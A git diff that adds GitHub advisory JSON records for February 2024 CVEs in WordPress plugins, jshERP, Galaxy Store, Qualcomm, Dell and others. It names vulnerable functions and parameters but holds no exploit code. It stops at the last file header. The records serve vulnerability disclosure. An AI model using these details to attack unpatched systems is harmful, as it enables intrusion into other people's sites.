b/advisories/unreviewed/2024/02/GHSA-r947-98rq-44mh/GHSA-r947-98rq-44mh.json new file mode 100644 index 0000000000000..512abd987a063 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r947-98rq-44mh/GHSA-r947-98rq-44mh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r947-98rq-44mh", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-20824" + ], + "details": "Implicit intent hijacking vulnerability in VoiceSearch of Galaxy Store prior to version 4.5.63.6 allows local attackers to access sensitive information via implicit intent.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20824" + }, + { + "type": "WEB", + "url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2024&month=02" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T03:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-r9gf-3xf2-q7x5/GHSA-r9gf-3xf2-q7x5.json b/advisories/unreviewed/2024/02/GHSA-r9gf-3xf2-q7x5/GHSA-r9gf-3xf2-q7x5.json new file mode 100644 index 0000000000000..0a52eefdeb559 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-r9gf-3xf2-q7x5/GHSA-r9gf-3xf2-q7x5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9gf-3xf2-q7x5", + "modified": "2024-02-08T15:30:27Z", + "published": "2024-02-08T15:30:27Z", + "aliases": [ + "CVE-2024-24878" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PT Woo Plugins (by Webdados) Portugal CTT Tracking for WooCommerce allows Reflected XSS.This issue affects Portugal CTT Tracking for WooCommerce: from n/a through 2.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24878" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/portugal-ctt-tracking-woocommerce/wordpress-portugal-ctt-tracking-for-woocommerce-plugin-2-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T13:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rch8-65jx-7vj9/GHSA-rch8-65jx-7vj9.json b/advisories/unreviewed/2024/02/GHSA-rch8-65jx-7vj9/GHSA-rch8-65jx-7vj9.json new file mode 100644 index 0000000000000..d4e0c4a66ecf6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rch8-65jx-7vj9/GHSA-rch8-65jx-7vj9.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rch8-65jx-7vj9", + "modified": "2024-02-06T06:30:32Z", + "published": "2024-02-06T06:30:32Z", + "aliases": [ + "CVE-2023-43535" + ], + "details": "Memory corruption when negative display IDs are sent as input while processing DISPLAYESCAPE event trigger.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43535" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-129" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rf3h-hj2j-v6cr/GHSA-rf3h-hj2j-v6cr.json b/advisories/unreviewed/2024/02/GHSA-rf3h-hj2j-v6cr/GHSA-rf3h-hj2j-v6cr.json new file mode 100644 index 0000000000000..f062b35ecb98d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rf3h-hj2j-v6cr/GHSA-rf3h-hj2j-v6cr.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rf3h-hj2j-v6cr", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0790" + ], + "details": "The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8.1. This is due to missing or incorrect nonce validation on the wpbe_create_new_term, wpbe_update_tax_term, and wpbe_delete_tax_term functions. This makes it possible for unauthenticated attackers to create, modify and delete taxonomy terms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Furthermore, the functions wpbe_save_options, wpbe_bulk_delete_posts_count, wpbe_bulk_delete_posts, and wpbe_save_meta are vulnerable to Cross-Site Request Forgery allowing for plugin options update, post count deletion, post deletion and modification of post metadata via forged request.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0790" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/bulk-editor/trunk/index.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3028699%40bulk-editor%2Ftrunk&old=3012874%40bulk-editor%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6c48f94b-d193-429a-9383-628ae12bfdf3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rfgg-652g-cx2q/GHSA-rfgg-652g-cx2q.json b/advisories/unreviewed/2024/02/GHSA-rfgg-652g-cx2q/GHSA-rfgg-652g-cx2q.json new file mode 100644 index 0000000000000..e2098a400604e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rfgg-652g-cx2q/GHSA-rfgg-652g-cx2q.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfgg-652g-cx2q", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-24002" + ], + "details": "jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.MaterialController: com.jsh.erp.utils.BaseResponseInfo getListWithStock() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24002" + }, + { + "type": "WEB", + "url": "https://github.com/jishenghua/jshERP/issues/99" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24002.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rhq8-qg6g-j259/GHSA-rhq8-qg6g-j259.json b/advisories/unreviewed/2024/02/GHSA-rhq8-qg6g-j259/GHSA-rhq8-qg6g-j259.json new file mode 100644 index 0000000000000..2876b9b00000c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rhq8-qg6g-j259/GHSA-rhq8-qg6g-j259.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rhq8-qg6g-j259", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-24004" + ], + "details": "jshERP v3.3 is vulnerable to SQL Injection. The com.jsh.erp.controller.DepotHeadController: com.jsh.erp.utils.BaseResponseInfo findInOutDetail() function of jshERP does not filter `column` and `order` parameters well enough, and an attacker can construct malicious payload to bypass jshERP's protection mechanism in `safeSqlParse` method for sql injection.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24004" + }, + { + "type": "WEB", + "url": "https://github.com/jishenghua/jshERP/issues/99" + }, + { + "type": "WEB", + "url": "https://github.com/cxcxcxcxcxcxcxc/cxcxcxcxcxcxcxc/blob/main/cxcxcxcxcxc/about-2024/24004.txt" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rj43-7hfm-whrc/GHSA-rj43-7hfm-whrc.json b/advisories/unreviewed/2024/02/GHSA-rj43-7hfm-whrc/GHSA-rj43-7hfm-whrc.json new file mode 100644 index 0000000000000..e80cf867fd007 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rj43-7hfm-whrc/GHSA-rj43-7hfm-whrc.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rj43-7hfm-whrc", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-24304" + ], + "details": "In the module \"Mailjet\" (mailjet) from Mailjet for PrestaShop before versions 3.5.1, a guest can download technical information without restriction.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24304" + }, + { + "type": "WEB", + "url": "https://github.com/mailjet/prestashop-mailjet-plugin-apiv3/releases/tag/v3.5.1" + }, + { + "type": "WEB", + "url": "https://security.friendsofpresta.org/modules/2024/02/06/mailjet.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T09:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rjcv-w9x4-9624/GHSA-rjcv-w9x4-9624.json b/advisories/unreviewed/2024/02/GHSA-rjcv-w9x4-9624/GHSA-rjcv-w9x4-9624.json new file mode 100644 index 0000000000000..1543b4b703e73 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rjcv-w9x4-9624/GHSA-rjcv-w9x4-9624.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjcv-w9x4-9624", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51669" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Artios Media Product Code for WooCommerce allows Stored XSS.This issue affects Product Code for WooCommerce: from n/a through 1.4.4.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51669" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/product-code-for-woocommerce/wordpress-product-code-for-woocommerce-plugin-1-4-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rm4j-xw99-x97h/GHSA-rm4j-xw99-x97h.json b/advisories/unreviewed/2024/02/GHSA-rm4j-xw99-x97h/GHSA-rm4j-xw99-x97h.json new file mode 100644 index 0000000000000..e229e7d527b2c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rm4j-xw99-x97h/GHSA-rm4j-xw99-x97h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm4j-xw99-x97h", + "modified": "2024-02-08T15:30:26Z", + "published": "2024-02-08T12:30:48Z", + "aliases": [ + "CVE-2023-6518" + ], + "details": "Plaintext Storage of a Password vulnerability in Mia Technology Inc. MİA-MED allows Read Sensitive Strings Within an Executable.This issue affects MİA-MED: before 1.0.7.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6518" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0087" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-256" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T12:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rmw7-92wx-897r/GHSA-rmw7-92wx-897r.json b/advisories/unreviewed/2024/02/GHSA-rmw7-92wx-897r/GHSA-rmw7-92wx-897r.json new file mode 100644 index 0000000000000..eec5625346571 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rmw7-92wx-897r/GHSA-rmw7-92wx-897r.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rmw7-92wx-897r", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0448" + ], + "details": "The Elementor Addons by Livemesh plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget URL parameters in all versions up to, and including, 8.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0448" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/services/content.php#L20" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/addons-for-elementor/trunk/templates/addons/team-members/style1.php#L17" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3026261%40addons-for-elementor%2Ftrunk&old=3022220%40addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/058d1aa0-2ef6-49a4-b978-43a91c8e55f3?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rpjv-hwjc-55jj/GHSA-rpjv-hwjc-55jj.json b/advisories/unreviewed/2024/02/GHSA-rpjv-hwjc-55jj/GHSA-rpjv-hwjc-55jj.json new file mode 100644 index 0000000000000..67aacc43005e2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rpjv-hwjc-55jj/GHSA-rpjv-hwjc-55jj.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpjv-hwjc-55jj", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2024-0221" + ], + "details": "The Photo Gallery by 10Web – Mobile-Friendly Image Gallery plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.8.19 via the rename_item function. This makes it possible for authenticated attackers to rename arbitrary files on the server. This can lead to site takeovers if the wp-config.php file of a site can be renamed. By default this can be exploited by administrators only. In the premium version of the plugin, administrators can give gallery management permissions to lower level users, which might make this exploitable by users as low as contributors.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0221" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L291" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/photo-gallery/trunk/filemanager/controller.php#L441" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3022981%40photo-gallery%2Ftrunk&old=3013021%40photo-gallery%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3a3b8f32-f29d-4e67-8fad-202bfc8a9918?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rpw7-c5cp-v8vp/GHSA-rpw7-c5cp-v8vp.json b/advisories/unreviewed/2024/02/GHSA-rpw7-c5cp-v8vp/GHSA-rpw7-c5cp-v8vp.json new file mode 100644 index 0000000000000..ef4938006daf3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rpw7-c5cp-v8vp/GHSA-rpw7-c5cp-v8vp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpw7-c5cp-v8vp", + "modified": "2024-02-07T03:30:33Z", + "published": "2024-02-07T03:30:33Z", + "aliases": [ + "CVE-2024-0849" + ], + "details": "Leanote version 2.7.0 allows obtaining arbitrary local files. This is possible\n\nbecause the application is vulnerable to LFR.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0849" + }, + { + "type": "WEB", + "url": "https://fluidattacks.com/advisories/alesso" + }, + { + "type": "WEB", + "url": "https://github.com/leanote/desktop-app" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T03:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rpxv-j4q4-prcp/GHSA-rpxv-j4q4-prcp.json b/advisories/unreviewed/2024/02/GHSA-rpxv-j4q4-prcp/GHSA-rpxv-j4q4-prcp.json new file mode 100644 index 0000000000000..b98afdb9c6ca4 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rpxv-j4q4-prcp/GHSA-rpxv-j4q4-prcp.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpxv-j4q4-prcp", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0382" + ], + "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 9.1.0 due to unrestricted use of the 'header_tag' attribute. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0382" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/shortcodes/class-wprm-shortcode-helper.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1f463ed1-06ad-430f-b450-1a73dc54f8a7?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rqqw-5q6g-cjxv/GHSA-rqqw-5q6g-cjxv.json b/advisories/unreviewed/2024/02/GHSA-rqqw-5q6g-cjxv/GHSA-rqqw-5q6g-cjxv.json new file mode 100644 index 0000000000000..7bbb0841186fa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rqqw-5q6g-cjxv/GHSA-rqqw-5q6g-cjxv.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rqqw-5q6g-cjxv", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2024-0255" + ], + "details": "The WP Recipe Maker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wprm-recipe-text-share' shortcode in all versions up to, and including, 9.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0255" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php#L52" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3019769/wp-recipe-maker/trunk/includes/public/class-wprm-icon.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/53a51408-e5d8-4727-9dec-8321c062c31e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rrv7-vmq5-x86q/GHSA-rrv7-vmq5-x86q.json b/advisories/unreviewed/2024/02/GHSA-rrv7-vmq5-x86q/GHSA-rrv7-vmq5-x86q.json new file mode 100644 index 0000000000000..c742691140b00 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rrv7-vmq5-x86q/GHSA-rrv7-vmq5-x86q.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rrv7-vmq5-x86q", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-1264" + ], + "details": "A vulnerability has been found in Juanpao JPShop up to 1.5.02 and classified as critical. Affected by this vulnerability is the function actionUpdate of the file /api/controllers/common/UploadsController.php. The manipulation of the argument imgage leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-253003.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1264" + }, + { + "type": "WEB", + "url": "https://note.zhaoj.in/share/f8b2IX7GsZS5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253003" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253003" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rv54-p5vw-c6p6/GHSA-rv54-p5vw-c6p6.json b/advisories/unreviewed/2024/02/GHSA-rv54-p5vw-c6p6/GHSA-rv54-p5vw-c6p6.json new file mode 100644 index 0000000000000..f054b2e180700 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rv54-p5vw-c6p6/GHSA-rv54-p5vw-c6p6.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv54-p5vw-c6p6", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2024-0324" + ], + "details": "The User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wppb_two_factor_authentication_settings_update' function in all versions up to, and including, 3.10.8. This makes it possible for unauthenticated attackers to enable or disable the 2FA functionality present in the Premium version of the plugin for arbitrary user roles.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0324" + }, + { + "type": "WEB", + "url": "https://github.com/WordpressPluginDirectory/profile-builder/blob/main/profile-builder/admin/admin-functions.php#L517" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3022354/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/23caef95-36b6-40aa-8dd7-51a376790a40?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rvgx-76xx-c287/GHSA-rvgx-76xx-c287.json b/advisories/unreviewed/2024/02/GHSA-rvgx-76xx-c287/GHSA-rvgx-76xx-c287.json new file mode 100644 index 0000000000000..99666ee1afdd2 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rvgx-76xx-c287/GHSA-rvgx-76xx-c287.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rvgx-76xx-c287", + "modified": "2024-02-07T15:30:48Z", + "published": "2024-02-07T15:30:48Z", + "aliases": [ + "CVE-2024-24130" + ], + "details": "Mail2World v12 Business Control Center was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Usr parameter at resellercenter/login.asp.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24130" + }, + { + "type": "WEB", + "url": "https://github.com/Hebing123/cve/issues/13" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T14:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rw8w-74p5-cf2h/GHSA-rw8w-74p5-cf2h.json b/advisories/unreviewed/2024/02/GHSA-rw8w-74p5-cf2h/GHSA-rw8w-74p5-cf2h.json new file mode 100644 index 0000000000000..6c229a9967609 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rw8w-74p5-cf2h/GHSA-rw8w-74p5-cf2h.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rw8w-74p5-cf2h", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2024-22430" + ], + "details": "\nDell PowerScale OneFS versions 8.2.x through 9.6.0.x contains an incorrect default permissions vulnerability. A local low privileges malicious user could potentially exploit this vulnerability, leading to denial of service.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22430" + }, + { + "type": "WEB", + "url": "https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T10:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json b/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json new file mode 100644 index 0000000000000..06c4ff10e180e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-rwrp-rr8g-cg9q/GHSA-rwrp-rr8g-cg9q.json 